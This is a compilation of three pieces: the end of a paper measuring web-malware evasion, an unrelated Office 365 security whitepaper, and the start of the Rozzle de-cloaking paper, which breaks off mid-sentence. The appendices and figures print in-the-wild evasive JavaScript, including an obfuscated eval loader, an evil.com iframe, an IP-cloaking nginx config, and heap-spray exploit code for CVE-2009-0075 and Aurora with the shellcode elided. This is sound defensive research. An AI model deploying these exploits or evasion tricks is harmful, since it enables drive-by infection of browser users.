Figure 15 demonstrates how Browser Emulation and VM honeypots can be combined to increase detection rates. We denote the signal output from the Browser Emulator as *Exploit*. In the case of VM detection we use the creation of new processes on the VM as a signal labeled *NewProcess*. For example, in December, 2008, 120,000 sites had the NewProcess signal, 98,000 had the Exploit signal, and 88,000 sites had both. Although both signals appear together on a large fraction of sites, during some time periods, they cover significantly different cases. In January 2009, Browser Emulation found 43,000 sites that did not trigger a NewProcess signal. In June 2008, the NewProcess signal identified 68,000 sites that were missed by emulation. Over the entire time period both signals agreed 60.3% of the time. The Exploit signal triggered by itself 9.3% of the time whereas the New Process signal occurred by itself 30.4% of the time. This indicates that neither signal suffices to provide good detection, but both can be used to complement one another.

Figures 16 and 17 compare both Exploit and NewProcess signals to Anti-Virus signals labeled *Virus*. On average, AV signals and Exploit signals intersect on 45.4% of the sites, although AV signals appear on 54.4% of sites that do not have Exploit signals. On average, AV signals and NewProcess signals occur together on 57.3% of the sites. However, AV signals appear on 39.4% of sites where we did not get any NewProcess signals. AV engines trigger independently on resources in the data set. We investigated the causes of the excess AV signals and noticed that many were due to AV signatures that flag web pages with resources, e.g., IFRAMES, pointing to web-sites that match certain regular expression patterns,



**Figure 16: The graph shows sites with Exploit and Virus signals.**



**Figure 17: The graph shows sites with New Process and Virus signals.**

regardless of the content served by these sites. In other cases, AV engines were flagging binary downloads delivered by social engineering and thus did not trigger any exploit signals. As discussed in Section 5.3, AV engines are susceptible to false positives in operational settings, and thus cannot be solely relied upon to flag malicious sites.

While each of the aforementioned detection technologies can be combined to improve web malware detection, they all remain susceptible to IP cloaking which prevents the classifiers from seeing malicious content. To illustrate the impact of cloaking we compare the detection based on all the above signals combined versus detection based on domain reputation. The bars labeled *BadSignal* in Figure 18 show how often an Exploit, NewProcess, or Virus signal occurs on a site in a given month. We compare this to sites that include content from a site known to distribute malware labeled *Reputation*. From 2007 through 2008, 7.21% of sites had only a bad reputation signal. In 2009, this number increased to 36.5%, and in 2010 it increased to 48.5%. Note that the dramatic increase in sites only detected by cloaking corresponds to the jump in cloaking behavior in Figure 14. At the same time the number of sites with only BadSignals remains low, which implies that our system is able to boot strap classification of domains that cloak with only a small amount of data.

# 7. CONCLUSION

Researchers have proposed numerous approaches for detecting the ever-increasing number of web sites spreading malware via drive-by downloads. Adversaries have responded with a number of techniques to bypass detection. This paper studies whether evasive practices are effective, and whether they are being pursued at a large scale.

Our study focuses on the four most prevalent detections techniques: Virtual Machine honeypots, Browser Emulation honeypots, Classification based on Domain Reputation, and Anti-Virus Engines. We measure the extent to which evasion affects each of these schemes by analyzing four years worth of data collected by Google SafeBrowsing infrastructure. Our experiments corroborate our hypothesis that malware authors continue to pursue delivery mechanisms that can confuse different malware detection systems. We find that Social Engineering is growing and poses challenges to VM-based honeypots. JavaScript obfuscation that interacts heavily with the DOM can be used to evade both Browser Emulators and



**Figure 18: The graph shows sites with bad signals vs sites that include content from a site with bad reputation.**

AV engines. In operational settings, AV Engines also suffer significantly from both false positives and false negatives. Finally, we see a rise in IP cloaking to thwart content-based detection schemes.

Despite evasive tactics, we show that adopting a multi-pronged approach can improve detection rates. We hope that these observations will be useful to the research community. Furthermore, these findings highlight important design considerations for operational systems. For example, data that is served to the general public might trade higher false negative rates for reduced false positives. On the other hand, a private institution might tolerate higher false positive rates to improve protection. Furthermore, a system that serves more users might become a target of circumvention and thus need to devote extra effort to detect cloaking.

# 8. REFERENCES

[1] M. Antonakakis, R. Perdisci, D. Dagon, W. Lee, and N. Feamster. Building a Dynamic Reputation System for DNS. In *Proceedings of the 19th USENIX Security Symposium (August 2010)*.

[2] F. Chang, J. Dean, S. Ghemawat, W. Hsieh, D. Wallach, M. Burrows, T. Chandra, A. Fikes, and R. Gruber. Bigtable:

A distributed storage system for structured data. *ACM Transactions on Computer Systems (TOCS)*, 26(2):1–26, 2008.

[3] M. Cova, C. Kruegel, and G. Vigna. Detection and analysis of drive-by-download attacks and malicious JavaScript code. In *Proceedings of the 19th international conference on World wide web*, pages 281–290. ACM, 2010.

[4] M. Felegyhazi, C. Kreibich, and V. Paxson. On the Potential of Proactive Domain Blacklisting. In *Proceedings of the 3rd USENIX conference on Large-scale exploits and emergent threats: botnets, spyware, worms, and more*, page 6. USENIX Association, 2010.

[5] Google. V8 JavaScript Engine. http://code.google.com/p/v8/.

[6] Microsoft. About Conditional Comments. http://msdn.microsoft.com/en-us/library/ms537512(v=vs.85).aspx.

[7] Microsoft. Conditional Compilation (JavaScript). http://msdn.microsoft.com/en-us/library/121hzt k3(v=vs.94).aspx.

[8] Microsoft. Microsoft Security Bulletin MS06-014: Vulnerability in the Microsoft Data Access Components (MDACS) Function Could Allow Code Execution., May 2006.

[9] A. Moshchuk, T. Bragin, D. Deville, S. Gribble, and H. Levy. Spyproxy: Execution-based detection of malicious web content. In *Proceedings of 16th USENIX Security Symposium on USENIX Security Symposium*, pages 1–16. USENIX Association, 2007.

[10] A. Moshchuk, T. Bragin, S. Gribble, and H. Levy. A crawler-based study of spyware in the web. In *Proceedings of Network and Distributed Systems Security Symposium*, 2006.

[11] Mozilla. JavaScript:TraceMonkey. https://wiki.mozilla.org/JavaScript:TraceMonkey.

[12] Mozilla. What is SpiderMonkey? http://www.mozilla.org/js/spidermonkey/.

[13] J. Nazario. PhoneyC: A virtual client honeypot. In *Proceedings of the 2nd USENIX conference on Large-scale exploits and emergent threats: botnets, spyware, worms, and more*, page 6. USENIX Association, 2009.

[14] J. Oberheide, E. Cooke, and F. Jahanian. Cloudav: N-version Antivirus in the Network Cloud. In *Proceedings of the 17th conference on Security symposium*, pages 91–106. USENIX Association, 2008.

[15] T. H. Project. Capture-hpc. http://projects.honeynet.org/capture-hpc.

[16] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose. All Your iFRAMEs Point to Us. In *USENIX Security Symposium*, pages 1–16, 2008.

[17] N. Provos, D. McNamee, P. Mavrommatis, K. Wang, and N. Modadugu. The Ghost in the Browser: Analysis of Web-based Malware. In *Proceedings of the first USENIX workshop on hot topics in Botnets (HotBots'07).*, April 2007.

[18] M. A. Rajab, L. Ballard, P. Mavrommatis, N. Provos, and X. Zhao. The Nocebo Effect on the Web: An Analysis of Fake Anti-Virus Distribution. In *Proceedings of the 3rd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET)*, April 2010.

[19] Y.-M. Wang, D. Beck, X. Jiang, R. Roussev, C. Verbowski, S. Chen, and S. King. Automated web patrol with strider

honeymonkeys. In *Proceedings of Network and Distributed Systems Security Symposium*, pages 35–49, 2006.

# APPENDIX

## A. ANALYSIS-RESISTANT JAVASCRIPT

Here we provide examples of code from the wild that actively try to evade browser emulators. The code has been deobfuscated for readability purposes. As discussed in Section 3, there are at least three different browser characteristics that can be tested before delivering a payload: JavaScript environment, parser capabilities, and the DOM.

**JavaScript Environment.** IE's JavaScript environment is different than those provided by other open source JavaScript engines. For example, IE allows ; before a catch or finally clause in JavaScript, whereas SpiderMonkey will report a parse error.

```
try{} ; catch(e) {} bad();
```

IE also supports case-insensitive access to ActiveX object properties in JavaScript.

```
var obj=new ActiveXObject(objName);
obj.vAr=1; if (obj.VaR==1) bad();
```

Malicious web pages often identify emulators by testing that ActiveX creation returns sane values.

```
try {new ActiveXObject("asdf")} catch(e) {bad()}
```

IE also supports the execScript method, which evaluates code within the global scope, whereas other engines do not.

**JavaScript and HTML Parsers.** IE supports conditional compilation in JavaScript [7], other browsers do not. Thus IE's JavaScript parser knows how to parse the following comment, and will generate code that calls the function bad() only in the 32-bit version of IE.

```
/* @cc_on
  @if (@_win32)
    bad();
  @end
@ */
```

IE also supports conditional parsing in its HTML parser. Conditional comments allow IE to execute code contingent upon version numbers [6].

```
<!--[if IE 9]><iframe src=http://evil.com/</iframe><![endif]-->
```

Integration between the HTML parser and the scripting environment may also be tested by examining the behavior of document.write. The output of this call should be immediately handled by the parser, and any side effects should be immediately propagated to the JavaScript environment.

```
document.write("<div id=d></div>")
if (d.tagName==="DIV") bad()
```

**The DOM.** There are many ways in which the DOM can be probed for feature-completeness. The snippet from the figure below was found in the wild. It tests that the DOM implementation yields the correct tree-like structure, even in the face of misnested close tags. It also verifies that the title variable is correctly exposed within the document object.

```
<html><head><title>split</title></head><body>
<b id="node" style="display:none;">999999qq
<i>99999999qqf<i>rom<i>Ch<i>a</i>rC</i>o</i>
d</i>e</i>qq</i>ev</i>alqqwin<i>do</i>w</b>
<script>
function nfc(node) {
    var r = "";
    for(var i=0; i<node.childNodes.length; i++) {
        switch(node.childNodes[i].nodeType) {
```

```
      case 1: r+=nfc(node.childNodes[i]); break;
      case 3: r+=node.childNodes[i].nodeValue;
    }
  }
  return r;
}

var nf = nfc(node)[document.title]("qq");
</script>
<script>
window["cccevalccc".substr(3,4)]("var nf_window="+nf[4]);
var data = "qq10qq118qq97[...]";

var data_array = data[document.title]("qq");
var jscript = "";
for (var i=1; i<data_array.length; i++)
  jscript+=String[nf[2]](data_array[i]);
nf_window[nf[3]](jscript);
```

## B.   IP-BASED CLOAKING

nginx configuration file for disallowing requests from certain IP addresses.

```
user apache;
worker_processes   2;

http {
  ...

  #//G
  deny XXX.XXX.160.0/19;
  deny XXX.XXX.0.0/20;
  deny XXX.XXX.64.0/19;
  ...

  server {
    listen 8080;
    location / {
      proxy_pass          http://xxxxx.com:4480;
      proxy_redirect      off;
      proxy_ignore_client_abort on;
      proxy_set_header    X-Real-IP   $remote_addr;
      proxy_set_header    Host        $host;
      proxy_buffers       100 50k;
      proxy_read_timeout 300;
      proxy_send_timeout 300;
    }
  }
}
```

## C.   EXPLOIT FOR CVE-2009-0075

```
var sc = unescape("..."); // shellcode
var mem = new Array();
var ls = 0x100000 - (sc.length * 2 + 0x01020);
var b = unescape("%u0c0c%u0c0c");
while (b.length < ls / 2) b += b;

var lh = b.substring(0, ls / 2);
delete b;
for (i = 0; i < 0xc0; i++) mem[ i ] = lh + sc;

CollectGarbage();
var badsrc = unescape(
  "%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAA");
var imgs = new Array();
for (var i = 0; i < 1000; i++)
  imgs.push(document.createElement("img"));

obj1 = document.createElement("tbody");
obj1.click();
var obj2 = obj1.cloneNode();
obj1.clearAttributes();
obj1 = null;
CollectGarbage();
for (var i = 0; i < imgs.length; i++)
  imgs[i].src = badsrc;
obj2.click();
```

Code to exploit the bug described by CVE-2009-0075.

## D.   THE "AURORA" EXPLOIT

```
<html><head><script>
var evt = null;
// SKIPPED: Generate shellcode and the spray heap.
var a = new Array();
for (i = 0; i < 200; i++) {
  a[i] = document.createElement("COMMENT");
  a[i].data = "abcd";
}

function ev1(evt) {
  evt = document.createEventObject(evt);
  document.getElementById("handle").innerHTML = "";
  window.setInterval(ev2, 50);
}

function ev2() {
  var data = unescape(
    "%u0a0a%u0a0a%u0a0a%u0a0a"
    "%u0a0a%u0a0a%u0a0a%u0a0a");
  for (i = 0; i < a.length; i++)
    a[i].data = data;
  evt.srcElement;
}
</script></head><body>
<span id="handle"><img src="foo.gif" onload="ev1(event)" />
</span></body></html>
```

Code to exploit the bug described by CVE-2010-0249. Emulating this correctly requires a proper DOM implementation and event model.

## E.   DOM FUNCTIONS

This appendix provides the listing of functions and properties that we labeled during JavaScript tracing. For properties, we differentiate between read and write access, e.g. reading the `innerHTML` property is different than writing to it.

| | | | |
|---|---|---|---|
| 0 | addEventListener | 17 | hasAttribute |
| 1 | appendChild | 18 | hasChildNodes |
| 2 | attachEvent | 19 | innerHTML (read) |
| 3 | body (read) | 20 | innerHTML (write) |
| 4 | childNodes (read) | 21 | insertBefore |
| 5 | clearAttributes | 22 | lastChild (read) |
| 6 | createComment | 23 | nextSibling (write) |
| 7 | createElement | 24 | outerHTML (read) |
| 8 | createTextNode | 25 | outerHTML (write) |
| 9 | detachEvent | 26 | parentNode (read) |
| 10 | documentElement (read) | 27 | previousSibling (read) |
| 11 | firstChild (read) | 28 | removeAttribute |
| 12 | getAttribute | 29 | removeChild |
| 13 | getElementById | 30 | removeEventListener |
| 14 | getElementsByClassName | 31 | setAttribute |
| 15 | getElementsByName | 32 | text (read) |
| 16 | getElementsByTagName | 33 | text (write) |

# APPENDIX
# 2



# Security in Office 365

## Whitepaper

Published:  June 2011

**Microsoft® Office** 365

*Microsoft*

# Table of Contents

3    Introduction

3    Challenges

4    A secure foundation

5    Privacy and data ownership

5    Built-in security

6    Flexibility to meet advanced security needs

7    Conclusion

# Introduction

This paper provides an overview of the security practices and technology that support enterprise-grade security in Microsoft Office 365 for businesses of all sizes. For a comprehensive and detailed treatment of security in Office 365, download the Office 365 Security Service Description, available at http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6c6ecc6c-64f5-490a-bca3-8835c9a4a2ea.

Microsoft® Office 365 delivers the power of cloud productivity to businesses of all sizes, helping to save time and money and free up valued resources. Office 365 combines the familiar Office desktop suite with cloud-based versions of our next-generation communications and collaboration services: Microsoft Exchange Online, Microsoft SharePoint® Online and Microsoft Lync™ Online.

When allowing an external service provider to store and manage their data, companies and other organizations must consider security, data protection, privacy, and data ownership. Microsoft takes these concerns seriously and has applied its years of cloud and on-premises experience with security and privacy to the Office 365 services. Microsoft Online Services can help you get the benefits of cloud computing with the enterprise-grade security you require, whatever the size of your organization. Microsoft takes a comprehensive approach to protecting your data at both the physical layer (exemplified by our $2 billion investment in state-of-the-art data centers) and the logical layer (for example, with security-aware engineering practices for services and software).

Office 365 provides secure access across platforms and devices, as well as premium anti-spam and antivirus technologies that are automatically updated to protect against the latest threats. The security features and services associated with Office 365 are built in, reducing the time and cost associated with securing your IT systems. At the same time, Office 365 enables you to easily control permissions, policies, and features through online administration and management consoles so you can configure Office 365 to meet your specific security needs.

# Challenges

With more workers on the go, your business information is likely accessed by more people and from more places and platforms than ever before. However, this increased access also increases the attack surface of IT. And, those attacks become more and more sophisticated and malicious. Today, cybercrime is perpetrated by highly organized, financially motivated professional criminals. A comprehensive approach to security is required to protect your systems and data in this environment. Microsoft's end-to-end approach to security includes engineering more secure services and software, effectively monitoring and responding to threats, and researching emerging threats to protect against them before they become problems. With continuing rapid growth in the sheer quantity of data generated by ordinary business operations, data backup and recovery have become major cost centers for IT departments today. Organizations need scalable, affordable solutions for ensuring their data is available 24/7.

Given these many challenges, many organizations discover that Office 365 can provide a higher standard of security at lower cost than they are capable of maintaining with on-premises productivity servers. Office 365 customers are freed from the costly burden of deploying and managing antivirus, anti-spam, backup, and disaster recovery solutions in-house. Office 365 provides built-in scalability and disaster recovery to accommodate growing volumes of business-critical data—all for a fixed, predictable cost. Distinct from other cloud productivity vendors' offerings, Office 365 provides the flexibility to temporarily or permanently maintain a hybrid environment so you can move to the cloud gradually or maintain some users on-premises indefinitely.

## A secure foundation

Microsoft has been providing online services for many years. Microsoft Global Foundation Services (GFS), the group responsible for hosting Office 365 and all of Microsoft's online services, started in 1994 with the introduction of MSN and has grown to include some of the world's most well-known Internet properties. The online services infrastructure layer (GFS) is regularly audited by respected third party organizations. Through our comprehensive approach to security and privacy, Microsoft Global Foundation Services has obtained ISO 27001 and EU Safe Harbor certification and successfully completed SAS 70 Type II audit. Office 365 is based on proven technology, representing the latest generation of what was formerly known as Business Productivity Online Services (BPOS) with hundreds of thousands of satisfied customers. With Office 365, you benefit from this deep experience in the cloud.

Microsoft recognizes that security is an ongoing process, not a steady state—it must be constantly maintained, enhanced, and verified by experienced and trained personnel; supported by up-to-date software and hardware technologies; and refined through robust processes for designing, building, operating, and supporting our services.

Office 365 data is stored in Microsoft's own network of highly available data centers, strategically located around the world. These facilities are built from the ground up to protect services and data from harm, whether natural disaster or unauthorized access. Physical security best practices are maintained, including state-of-the-art hardware, 24-hour secured access, redundant power supplies, multiple fiber trunks, and other features. Because of system redundancy, updates can generally be deployed to the system without any downtime for your users. The system is protected at the logical layer by robust data isolation, continuous monitoring, and a wide array of other recognized practices and technologies. All of the physical and logical security tasks are taken care of in the data center, which can drastically reduce the amount of time you spend keeping your data and systems safe.

Since 2002, Microsoft has promoted security best practices internally and in the industry through the Trustworthy Computing initiative. An important part of Trustworthy Computing is engineering software that is more secure from the beginning. To this end, the products and services that make up Office 365—Microsoft Exchange Online, Microsoft SharePoint® Online, Microsoft Lync® Online, and Microsoft Office Professional Plus—were designed and built according to the rigorous security practices encoded in the

Microsoft Security Development Lifecycle (SDL). The SDL is constantly updated and freely shared within the software industry to help drive better security practices across vendors and platforms.

You need to ensure that business data is continuously available to your users. Because of Microsoft experience in hosting services as well as the close relationship between Office 365 and the Microsoft product and support teams, Office 365 can meet the high continuity standards customers demand. Service continuity protocols and technologies enable Office 365 to recover quickly from unexpected outages.

# Privacy and data ownership

Microsoft provides a coherent, robust, and transparent privacy policy emphasizing that you maintain ownership of your data. The Trust Center (available at the time of General Availability) tells you exactly how we handle and use data gathered in your interactions with Microsoft Online Services. If you decide to stop using Office 365, by default we provide 90 days of reduced functionality service, allowing you to export your data. Microsoft also provides multiple notices prior to deletion of customer data.

## Separation of customer data

Office 365 is a multi-tenant service, meaning that data is distributed among hardware resources. Therefore, your data may be stored on the same hardware as that of other customers. This is one reason that Office 365 can provide the cost and scalability benefits that it does. Microsoft goes to great lengths to ensure that the multi-tenant architecture of Office 365 supports enterprise privacy and security standards. Data storage and processing is logically segregated between customers through specialized Active Directory technology engineered specifically for the purpose. For organizations that want additional data isolation, a version of Office 365 is available that stores your data on dedicated hardware.

# Built-in Security

Unlike an on-premises installation that lives behind a corporate firewall and may be accessed over a virtual private network (VPN), Office 365 is designed specifically for secure access over the Internet. There are two options for user identification: Microsoft Online IDs and Federated IDs. In the first case, users create Microsoft Online Services accounts for use with Office 365. Users sign in to all their Office 365 services using a single login and password. The single sign-on application helps users easily create and use strong passwords that keep their services safe.

You can also choose federated identification, which uses on-premises Active Directory Federation Services (a service of Microsoft Windows Server 2008) to authenticate users on Office 365 using their corporate ID and password. In this scenario, identities are administered only on-premises. This also enables

organizations to use two-factor authentication (such as smart cards or biometrics in addition to passwords) for maximum security.

Regardless of how users sign in, connections established over the Internet to the Office 365 service are encrypted using industry-standard, 128-bit Secure Sockets Layer/Transport Layer Security (SSL/TLS) encryption. Office 365 supports additional security measures to protect sensitive information such as Secure/Multipurpose Internet Mail Extensions (S/MIME) for public key encryption and digital signatures as well as Information Rights Management protection for restricting who can access and perform specific actions on documents, email, and even voicemail messages.

With Office 365, you have complete access to your environment including user mailboxes, SharePoint Web sites and document stores. You maintain control over security policies and user accounts. This degree of control enables you to enforce your company's privacy and security policies effectively. Policies and users can be managed using a Web-based management console or Remote PowerShell for automation of routine tasks.

## Forefront Online Protection for Exchange

To protect incoming, outgoing, and internal email and shared files against viruses and spam, Office 365 includes Microsoft Forefront® Online Protection for Exchange. This multi-layered antivirus/anti-spam solution uses multiple scanning engines for highly accurate identification and mitigation of threats while minimizing "false positives" that can lead to improperly blocked email. Forefront technologies included with Office 365 are constantly updated with the latest threat signatures, helping to protect you from new and emerging threats without any additional work on your part.

## Flexibility to meet advanced security needs

Some organizations may face industry, regulatory or internal security requirements that go beyond what is offered in a distributed multitenant environment. For example, they may have restrictions on which countries data can be stored in, or need to keep all data within a certain country. Microsoft has designed the Office 365 to provide maximum flexibility for organizations to choose how they deploy. You can deploy Microsoft Exchange Server, Microsoft SharePoint® Server, and Microsoft Lync® Server on-premises today and easily move to the cloud later. You can choose to keep some users on-premises and have others in the cloud using coexistence, giving both sets of users the ability to see each other's free/busy information, share calendars, and communicate almost as if they were all using the same infrastructure.

# Conclusion

Moving productivity services to the cloud requires a serious consideration of security and privacy issues and technologies. Office 365 is designed to deliver the enterprise-grade security you require to move to the cloud with confidence. Our data centers are designed, built, and managed using a defense-in-depth strategy at both the physical and logical layers, and our services are engineered to be secure using the Security Development Lifecycle. Office 365 makes it easy for users and administrators to access and use data and services while following security best practices. We have built our cloud-based productivity services with you in mind, helping you embrace the advantages of the cloud on your terms and at your own pace.

# Resources

**Office 365**: http://office365.microsoft.com

**Microsoft Global Foundation Services**: http://www.globalfoundationservices.com

**Microsoft Data Center Videos**: http://www.globalfoundationservices.com/infrastructure/videos.html

**Microsoft Trustworthy Computing**: http://www.microsoft.com/about/twc/en/us/default.aspx

**Security Development Lifecycle**: http://www.microsoft.com/security/sdl/default.aspx

**Forefront Online Protection for Exchange**: http://technet.microsoft.com/en-us/forefront/cc540243

# APPENDIX
# 3

# Rozzle: De-Cloaking Internet Malware

Clemens Kolbitsch          Benjamin Livshits and Benjamin Zorn    Christian Seifert

Vienna University of Technology          Microsoft Research          Microsoft

**Microsoft Research Technical Report**

MSR-TR-2011-94

October 25, 2011



# Rozzle: De-Cloaking Internet Malware

Clemens Kolbitsch
Vienna University of Technology

Benjamin Livshits and Benjamin Zorn
Microsoft Research

Christian Seifert
Microsoft Corporation

*Abstract*—In recent years, attacks that exploit vulnerabilities in browsers and their associated plugins have increased significantly. These attacks are often written in JavaScript and literally millions of URLs contain such malicious content.

While static and runtime methods for malware detection have been proposed in the literature, both on the client side, for just-in-time in-browser detection, as well as offline, crawler-based malware discovery, these approaches encounter the same fundamental limitation. Web-based malware tends to be environment-specific, targeting a particular browser, often attacking specific versions of installed plugins. This targeting occurs because the malware exploits vulnerabilities in specific plugins and fail otherwise. As a result, a fundamental limitation for *detecting* a piece of malware is that malware is triggered infrequently, only showing itself when the right environment is present. In fact, we observe that using current *fingerprinting* techniques, just about any piece of existing malware may be made virtually undetectable with the current generation of malware scanners.

This paper proposes Rozzle, a JavaScript *multi-execution* virtual machine, as a way to explore multiple execution paths within a single execution so that environment-specific malware will reveal itself. Using large-scale experiments, we show that Rozzle increases the detection rate for *offline* runtime detection by almost seven times. In addition, Rozzle triples the effectiveness of online runtime detection. We show that Rozzle incurs virtually no runtime overhead and allows us to replace multiple VMs running different browser configurations with a single Rozzle-enabled browser, reducing the hardware requirements, network bandwidth, and power consumption.

## I. Introduction

In recent years, we have seen mass-scale exploitation of memory-based vulnerabilities migrate towards drive-by attacks delivered through the browser. With millions of infected URLs on the internet, JavaScript malware now constitutes a major threat. A recent 2011 report from Sophos Labs indicates that the number of malware pieces analyzed by Sophos Labs every day in 2010 — about 95,000 samples — nearly doubled from 2009 [56].

While static and runtime methods for malware detection have been proposed in the research literature (e.g., see [17, 18, 48]), both on the client side, for just-in-time in-browser detection, as well as offline, crawler-based malware discovery, these approaches encounter the same fundamental limitation. Web-based malware tends to be environment-specific, targeting a particular browser, often with specific versions of installed plugins. This targeting happens because the exploits will often only work on specific plugins and fail otherwise. As a result, a fundamental limitation for *detecting* a piece of malware is that malware is only triggered occasionally, given the right environment; an excerpted example of such malware is shown in Figure 1.

While this behavior has been observed previously in the context of x86 malware [36, 39, 67], the traditional approach to improving path coverage involves *symbolic execution*, a powerful multi-path exploration technique that is unfortunately often associated with non-trivial performance penalties [11, 12, 23, 50]. As such, off-the-shelf symbolic execution is not a feasible strategy. In a brute-force attempt to increase detection rates, offline detectors often deploy and utilize a variety of browser configurations side-by-side. While potentially effective, it is often unclear how many environment configurations are necessary to reveal all possibie malware that might be lurking within a particular web site. Conversely, many sites will be explored using different configurations despite the fact that their behavior is *not* environment-specific. As a result, this approach has significant negative implications on the overall hardware requirements, as well as power and network bandwidth consumption.

This paper proposes Rozzle, a JavaScript *multi-execution* virtual machine, as a way to explore multi-

```
1   var E5Jrh = null;
2   try {
3       E5Jrh = new ActiveXObject("AcroPDF.PDF")
4   } catch(e) { }
5   if(!E5Jrh)
6   try {
7       E5Jrh = new ActiveXObject("PDF.PdfCtrl")
8   } catch(e) { }
9   if(E5Jrh) {
10      lv = E5Jrh.GetVersions().split(",")[4].
11      split("=")[1].replace(/\./g,"");
12      if(lv < 900 && lv != 813)
13          document.write('<embed src=".../validate.php?s=PTq..."
14          width=100 height=100 type="application/pdf"></embed>')
15      }
16      try {
17          var E5Jrh = 0;
18          E5Jrh = (new ActiveXObject(
19              "ShockwaveFlash.ShockwaveFlash.9"))
20              .GetVariable("$" + "version").split(",")
21      } catch(e) { }
22      if(E5Jrh && E5Jrh[2] < 124)
23          document.write('<object classid="clsid:d27cdb6e-ae..."
24          width=100 height=100 align=middle><param name="movie"...');
25  }
```

**Fig. 1:** Typical JavaScript exploit found in the wild that demonstrates environment matching.

ple execution paths within a single execution so that environment-specific malware will reveal itself. ROZZLE implements a single-pass multi-execution approach that is able to detect considerably more malware without any noticeable overhead on most sites. The goal of our work is to increase the effectiveness of a dynamic crawler searching for malware so as to imitate multiple browser and environment configurations *without* dramatically reducing the throughput.

### A. Contributions

This paper makes the following contributions:

- **Insight.** We observe that typical JavaScript malware tends to be fragile; in other words, it is designed to execute in a particular environment, as opposed to benign JavaScript, which will run in an environment-independent fashion. We experimentally demonstrate that as a metric, *fragility* highly correlates with maliciousness in Section II.

- **Low-overhead multi-execution.** We describe ROZZLE, a system that *amplifies* other static and dynamic malware detectors. ROZZLE implements lightweight multi-execution for JavaScript, a low-overhead specialized execution technique that explores multiple malware execution paths in order to make malware reveal itself to both static and runtime analysis.

- **Detection effectiveness.** Using a collection of 65,855 JavaScript malware samples, 2.5% of which trigger a runtime malware detector, we show that ROZZLE increases the effectiveness of the runtime detector by almost a *factor of seven*, enabling detection of 17.5% of the samples. We also show that ROZZLE increases the detection capability of static and dynamic malware detection tools used in a dynamic web crawler, increasing runtime detections in that case over three-fold. When used for static online detection, ROZZLE finds an additional 5.6% of malicious URLs.

- **Runtime overhead.** Using a collection of 500 representative benign web sites, we show that the median CPU overhead is 0% and the 80th percentile is 1.1%. The median memory overhead is 0.6% and the 80th percentile is 1.4%. The average overhead is slightly higher, because of a few outliers: the CPU overhead averages 10% and the memory overhead of using ROZZLE is 3% on average.

- **Malware roulette.** We outline attack strategies that are not detectable with the current generation of static and runtime malware detection tools and use these attacks as a motivation and a quality bar for ROZZLE's design.

### B. Paper Organization

The rest of the paper is organized as follows. Section II gives some background information on JavaScript exploits and their detection. Section III gives an intuitive overview of ROZZLE. Section IV describes the implementation of our analysis. Section V describes our experimental evaluation. Section VI proposes ways to design more powerful attacks that would not be uncovered with the current generation of malware detection tools. Section VII discusses the limitations of ROZZLE. Section VIII discusses related work, and, finally, Section IX concludes.

## II. BACKGROUND

In the last several years, we have seen web-based malware experience a tremendous rise in popularity. Much of this is due to the fact that JavaScript, a type-safe language, can be used as a means of mounting drive-by attacks against web browsers. A prominent example of such attacks is *heap spraying* [53, 59], where many copies of the same shellcode are copied all over the browser heap before a jump to the heap is triggered through a vulnerability in the browser. This exploitation technique showcases the expressive power for a scripting language, since copying of the shellcode is typically accomplished with a single `for` loop. Our experience with NOZZLE [48], a runtime heap spraying detector and ZOZZLE [18], a static JavaScript malware detector, suggests that there are millions of malicious sites containing heap spraying as well as other kinds of JavaScript-based malware, such as scareware [22]. Previous reports point out to the prevalence of JavaScript malware cloaking [4, 14, 65]. Our experience indicates that various forms of cloaking, environment matching, or fingerprinting are virtually omnipresent in today's JavaScript malware. In fact, as we discovered, the degree to which a particular piece of code depends on the environment in which it runs — code fragility — is an excellent indicator of maliciousness; most benign code is environment-independent, whereas most malicious code does at least some cloaking, environment matching, or fingerprinting. The rest of this section is organized as follows. Section II-A presents a simple running example to motivate our discussion. Section II-B discusses several commonly used environment-specific malware practices. Section II-C presents an experiment where we show that *code fragility* correlates highly with code maliciousness.

### A. JavaScript Malware: An Example of Real-Life Malware

To give the reader a better understanding of individual problems our system has to address, we start with an example of a piece of browser fingerprinting code found in the wild. A cleaned up version of this example, shown in Figure 3, employs precise fingerprinting to deliver only selected exploits that are most likely to successfully attack the client browser. Lines 1–40 compile the portion of the fingerprint that records the presence of the Adobe Acrobat, Quicktime, and Java plugins. Lines 42–42 record the presence of the Windows Media Player. Lines 54–55 construct the `fingerprint` string variable and lines 58–77 augment it with the browser language. Finally, line 81

```
1  function killErrors() { return true; }
2  window.onerror = killErrors;
3  function jc() {
4      jc_list = [...]; // list of image locations
5      for (i= 0; i < jc_list.length; i++) {
6          ischeck = 1;
7          x = new Image();
8          x.src = "";
9          x.onerror = function() { ischeck = 0; }
10         x.src = jc_list[i];
11         if (ischeck == 1) return 1;
12         delete x;
13     }
14     return 0;
15 }
16 if (!jc()) {
17     var oop="sk";
18     // inject malware if not crawler
19     document.writeln(
20         "<iframe src=5.htm width=100 height=1></\/iframe>");
21 }
```

**Fig. 2:** Client-side cloaking designed to avoid dynamic crawlers.



**Fig. 3:** Sophisticated environment fingerprinting.

issues a request to a malware hosting site to fetch the malware that corresponds to the computed fingerprint.

### B. Current Practices: Matching, Cloaking, Fingerprinting

We distinguish between three loosely defined categories of techniques commonly used in today's malware: environment matching, fingerprinting, and cloaking, described in turn below.

**Environment matching:** Figure 1 shows a typical example of environment matching, found in most of the malware we find in the wild. In this case, the script determines the capabilities of the browser and selectively alters the content of the page, such as showing a movie.

**Fingerprinting:** Browser fingerprinting is a technique in which a variety of environment variables are evaluated to assess the capabilities of the browser. In contrast to environment matching, browser fingerprinting is more comprehensive and detailed in its assessment. Privacy advocates show that browser fingerprinting can be used to track users across sessions without the help of cookies as browsers carry unique information that results in unique fingerprints [20, 41]. Malware writers also use fingerprinting, as illustrated in Figure 3, to deliver malware customized for a particular browser configuration or, perhaps, even in the case of targeted attacks, for a particular user.

**Cloaking:** Offline malware scanning is used routinely to compile black lists of malicious URLs [47, 48]. In this scenario, cloaking can be successfully used by malware writers to avoid being detected when the malware-detecting crawler visits a particular site. We distinguish between *server-side cloaking*, which often operates by treating certain categories of HTTP headers or IP addresses, such as those coming from security vendors, differently, thereby avoiding detection, and *client-side cloaking*, which implements cloaking using JavaScript. Figure 2 shows an example of client-side cloaking we found in the wild. In this case, the crawler may *not* load images to save on

